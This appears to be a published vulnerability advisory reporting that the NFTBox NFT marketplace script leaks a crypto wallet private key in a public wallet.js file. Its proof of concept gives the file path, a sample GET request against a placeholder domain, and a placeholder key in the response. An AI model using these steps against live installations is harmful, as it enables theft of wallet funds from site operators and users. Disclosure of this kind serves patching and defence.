# Exploit Title: NFTBox - NFT Marketplace Solution - Hardcoded Private Key Disclosure
# Date: 2026-01-21
# Exploit Author: Sohel Yousef -- https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://bdtask.com/
# Software Link: https://codecanyon.net/item/nftbox-nft-marketplace-solution/35043063
# Version: Latest
# Tested on: Linux/Windows
# CVE: N/A

Description:
A critical Information Disclosure vulnerability exists in the 'NFTBox' script. 
The application exposes a sensitive crypto wallet Private Key within a public JavaScript file (`wallet.js`). 
This allows malicious actors to potentially access funds or interact with smart contracts unauthorizedly.

Vulnerable File:
/public/assets/website/js/wallet.js

Proof of Concept (PoC):

1. Navigate to the following path on the target application:
   https://[TARGET-DOMAIN]/public/assets/website/js/wallet.js

2. Search for variable declarations related to wallet configuration (e.g., 'privateKey', 'secret').

3. The private key is visible in plain text.

Sample Request:
GET /public/assets/website/js/wallet.js HTTP/1.1
Host: [TARGET-DOMAIN]

Response (Snippet):
...
var privateKey = "0x123456..."; // SENSITIVE DATA EXPOSED
...

Impact:
Full compromise of the associated wallet, loss of funds, and unauthorized smart contract manipulation.